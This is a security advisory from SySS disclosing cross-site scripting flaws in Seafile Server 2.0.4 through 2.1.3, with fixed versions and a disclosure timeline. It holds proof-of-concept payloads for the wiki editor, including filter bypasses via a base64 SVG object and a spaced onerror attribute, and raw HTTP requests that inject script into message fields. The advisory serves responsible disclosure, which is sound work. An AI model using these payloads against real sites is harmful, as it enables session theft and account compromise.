Advisory ID: | SYSS-2013-002 |
Product: | Seafile Server Community Edition |
Vendor: | Seafile Ltd. |
Affected Version(s): | 2.0.4 Linux, 2.1.2 Linux, 2.1.3 Linux |
Tested Version(s): | 2.0.4 Linux, 2.1.2 Linux, 2.1.3 Linux |
Vulnerability Type: | Cross-Site Scripting |
Risk Level: | High |
Solution Status: | Solved |
Vendor Notification: | 2013-12-16 |
Solution Date: | 2014-01-23 |
Public Disclosure: | 2014-01-23 |
CVE Reference: | Not assigned |
Author of Advisory: | Marcel Mangold, SySS GmbH, www.syss.de/advisories/ |
Document Date: | 2013-01-23 |
Document Version: | v1.4 |
The software suffers from persistent and reflected cross-site scripting vulnerabilities.
Persistent cross-site scripting is possible at least at the following places:
(1) The user wiki page allows any Java Script code to be entered in version 2.0.4. An attacker can use this to do persistent cross-site scripting.
In version 2.1.2 the cross-site scripting must be embedded as base64 into an object tag.
In version 2.1.3 spaces at the right place break the filter mechanism.
After commit 1d75bc079c15e30f6574272e25f1c7c7e5b87969 the issue has to be considered as fixed while validation still is performed as output validation on the client side.
(2) An attacker can send internal messages to others user of the application. The subject field of the messages is vulnerable for persistent cross-site scripting. This way an attacker can code have executed in the context of almost any user of the application. (Fixed in v.2.1.2)
(3) The application displays .svg vector graphics that have been uploaded via the file upload function. This file type may contain Java Script code which is executed in a users browser when the file is being displayed. (Fixed in v.2.1.2)
(4) An attacker can send internal messages to others user of the application.The receiver field is vulnerable for reflected cross-site scripting. This a is rather theoretical issue because xsrf token are used. (Fixed in v.2.1.3)
(1) Enter the following Code into the wiki editor v 2.1.2:
<object data=data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3
ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9y
Zy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHN
zIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlN5U1MgWFNTIik7PC9zY3JpcHQ+PC9zdmc+
type=image/svg+xml></object>
Enter the following Code into the wiki editor v 2.1.3:
<img src=# onerror =alert("SySS_XSS")>
(2)
Request:
+------------------------------------ |
POST /message/message_send/ HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de | Accept-Encoding: gzip, deflate
Referer: 127.0.0.1/user/1/msgs/
Cookie: csrftoken=vesdFHfKjk2IIu0sy8suwUzMOk066h1x; sessionid=[...] Connection: keep-alive | Content-Type: application/x-www-form-urlencoded
Content-Length: 150
csrfmiddlewaretoken=vesdFHfKjk2IIu0sy8suwUzMOk066h1x&mass_msg=<script>alert("SySS XSS")</script>&mass_email=victim%40sample.xy
+------------------------------------
Response:
+------------------------------------
[...]
<div class="txt">
<div class="msg-main">
<div class="msg-hd w100 ovhd">
<a class="author" href="/user/3/msgs/">seafile2</a>
<span class="time">vor 4 Sekunden</span>
</div>
<p class="msg-con"><script>alert("SySS XSS")</script></p> <span class="say"></span> </div> </div> </li>
[...]
+------------------------------------
(4)
Request:
+------------------------------------
POST /message/message_send/?from=all HTTP/1.1
Host: 127.0.0.1:8000 User-Agent: Mozilla/5.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: de
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRFToken: dAjlY2zLmP1SmdoneDzTBRG6XynhhAVk
X-Requested-With: XMLHttpRequest
Referer: 127.0.0.1/message/list/
Content-Length: 43
Cookie: csrftoken=dAjlY2zLmP1SmdoneDzTBRG6XynhhAVk; sessionid=zrqax[...]
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache mass_msg=asdf&mass_email=<script>alert(1)<%2fscript>
Response:
+------------------------------------
HTTP/1.1 400 BAD REQUEST
Server: gunicorn/0.16.1
Date: Tue, 07 Jan 2014 14:47:01 GMT
Connection: close
Vary: Accept-Language, Cookie |Content-Type: application/json; charset=utf-8
Content-Language: de
Content-Length: 130
{"html": "", "error": ["Senden der Nachricht an <script>alert(1)</script> fehlgeschlagen, da der Benutzer nicht gefunden wurde."]}
(1) Update to version 2.1.4 - vendor fixed the issue
(2) Update to version 2.1.2 - vendor fixed the issue
(3) Update to version 2.1.2 - vendor fixed the issue
(4) Update to version 2.1.3 - vendor fixed the issue
2013-12-02 - Vulnerability discovered
2013-12-16 - Vulnerability reported to developer
2013-12-30 - Patches for issues (2) and (3) commited to github
2014-01-07 - Vulnerability status reported to developer
2014-01-08 - Patches for issues commited to github
2014-01-11 - Received email from developer that new version 2.1.3 came out with issues fixed
2014-01-13 - Verified issue (4) is fixed
2014-01-13 - Vulnerability status reported to developer
2014-01-14 - Patch fo issue (1) committed to github while validation is still done using output filtering on the client-side (commit 1d75bc079c15e30f6574272e25f1c7c7e5b87969)
2014-01-23 - Version 2.1.4 published - this update solves all issues mentioned in this document
[1] SySS GmbH, SYSS-2013-002 - www.syss.de/advisories/SYSS-2013-002 - Persistent Cross-Site Scripting (XSS) in Seafile 2.0.4 Server
[2] SySS GmbH, SySS Responsible Disclosure Policy
Security vulnerability found by Responsible Hacker of the SySS GmbH
E-Mail: marcel.mangold@syss.de Public Key: www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Marcel_Mangold.asc
Key ID: AC15E5BE Key Fingerprint: E21C 69ED 9A64 7486 6EDD 5E29 4EFE B20B AC15 E5BE
The information provided in this security advisory is provided "as is" and without warranty of any kind.
Details of this security advisory may be updated in order to provide as accurate information as possible.
The latest version of this security advisory is available on the SySS Web site [1].
Creative Commons - Attribution (by) - Version 3.0
Ihr direkter Kontakt zu SySS +49 (0)7071 - 40 78 56-0 oder anfrage@syss.de | IN DRINGENDEN FÄLLEN AUSSERHALB DER GESCHÄFTSZEITEN +49 (0)7071 - 40 78 56-99
Als Rahmenvertragskunde wählen Sie bitte die bereitgestellte Rufbereitschaftsnummer
Ihr direkter Kontakt zu SySS +49 (0)7071 - 40 78 56-0 oder anfrage@syss.de
IN DRINGENDEN FÄLLEN AUSSERHALB DER GESCHÄFTSZEITEN +49 (0)7071 - 40 78 56-99
Als Rahmenvertragskunde wählen Sie bitte die bereitgestellte Rufbereitschaftsnummer
Direkter Kontakt
+49 (0)7071 - 40 78 56-0 oder anfrage@syss.de
IN DRINGENDEN FÄLLEN AUSSERHALB DER GESCHÄFTSZEITEN
+49 (0)7071 - 40 78 56-99
Als Rahmenvertragskunde wählen Sie bitte die bereitgestellte Rufbereitschaftsnummer